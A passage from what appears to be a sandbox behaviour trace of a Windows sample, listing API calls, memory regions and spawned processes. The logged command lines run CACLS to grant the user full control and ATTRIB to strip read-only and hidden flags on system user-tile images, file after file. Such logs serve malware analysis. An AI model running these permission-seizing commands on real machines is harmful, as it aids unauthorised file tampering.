lpFindFileData=0x26ebb8) returned 0xffffffff [0185.908] GetLastError () returned 0x2 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.908] GetLastError () returned 0x2 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x39e4d8 [0185.909] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0185.909] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.909] GetLastError () returned 0x2 [0185.909] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x39e4d8 [0185.909] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0185.909] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.909] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.909] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.909] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f000 | out: lpAttributeList=0x26ef38, lpSize=0x26f000) returned 1 [0185.909] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef38, lpPreviousValue=0x0) returned 1 [0185.909] GetStartupInfoW (in: lpStartupInfo=0x26eef4 | out: lpStartupInfo=0x26eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.909] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.909] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessInformation=0x26efe0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8a4, dwThreadId=0x8b0)) returned 1 [0185.911] CloseHandle (hObject=0x50) returned 1 [0185.911] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.911] GetEnvironmentStringsW () returned 0x3a2410* [0185.911] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.911] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.953] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eed4 | out: lpExitCode=0x26eed4*=0x0) returned 1 [0185.953] CloseHandle (hObject=0x4c) returned 1 [0185.953] _vsnwprintf (in: _Buffer=0x26f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee0 | out: _Buffer="00000000") returned 8 [0185.953] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.953] GetEnvironmentStringsW () returned 0x3a2410* [0185.953] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.953] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.953] GetEnvironmentStringsW () returned 0x3a2410* [0185.954] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.954] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef38 | out: lpAttributeList=0x26ef38) [0185.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.954] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.954] SetConsoleInputExeNameW () returned 0x1 [0185.954] GetConsoleOutputCP () returned 0x1b5 [0185.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.954] exit (_Code=0) Process: id = "377" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "376" os_parent_pid = "0xe9c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26570 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26571 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26572 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26573 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26574 start_va = 0xcf0000 end_va = 0xcf8fff entry_point = 0xcf0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26575 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26576 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26577 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26578 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26579 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26580 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26581 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26582 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26583 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26584 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 26585 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26586 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26587 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26588 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26589 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26590 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26591 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 539 os_tid = 0xeec Thread: id = 540 os_tid = 0xe10 Process: id = "378" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "376" os_parent_pid = "0xe9c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26592 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26593 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26594 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26595 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 26596 start_va = 0x560000 end_va = 0x566fff entry_point = 0x560000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26597 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26598 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26599 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26600 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26601 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26602 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26603 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26604 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26605 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26606 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 26607 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26608 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26609 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26610 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26611 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26612 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26613 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26614 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26615 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26616 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26617 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26618 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26619 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 26620 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26621 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 541 os_tid = 0x8b0 Process: id = "379" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26622 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26623 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26624 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26625 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26626 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26627 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26628 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26629 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26630 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 26631 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26632 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26633 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26634 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26635 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 26636 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 26637 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26638 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26639 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26640 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26641 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26642 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26643 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26644 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26645 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26646 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 26647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26649 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26650 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26651 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26652 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26653 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 26654 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 26655 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 26656 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 542 os_tid = 0x8fc [0186.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fc74 | out: lpSystemTimeAsFileTime=0x20fc74*(dwLowDateTime=0xa3c49880, dwHighDateTime=0x1d440a9)) [0186.005] GetCurrentProcessId () returned 0xdac [0186.005] GetCurrentThreadId () returned 0x8fc [0186.005] GetTickCount () returned 0x35282 [0186.005] QueryPerformanceCounter (in: lpPerformanceCount=0x20fc6c | out: lpPerformanceCount=0x20fc6c*=24279407497) returned 1 [0186.005] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.005] __set_app_type (_Type=0x1) [0186.005] __p__fmode () returned 0x76b331f4 [0186.006] __p__commode () returned 0x76b331fc [0186.006] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.006] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.006] GetCurrentThreadId () returned 0x8fc [0186.006] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x38 [0186.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.006] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.006] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fc04 | out: phkResult=0x20fc04*=0x0) returned 0x2 [0186.006] VirtualQuery (in: lpAddress=0x20fc3b, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.006] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fbd4, dwLength=0x1c | out: lpBuffer=0x20fbd4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0186.006] GetConsoleOutputCP () returned 0x1b5 [0186.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.007] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.007] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.007] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.007] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.007] _get_osfhandle (_FileHandle=0) 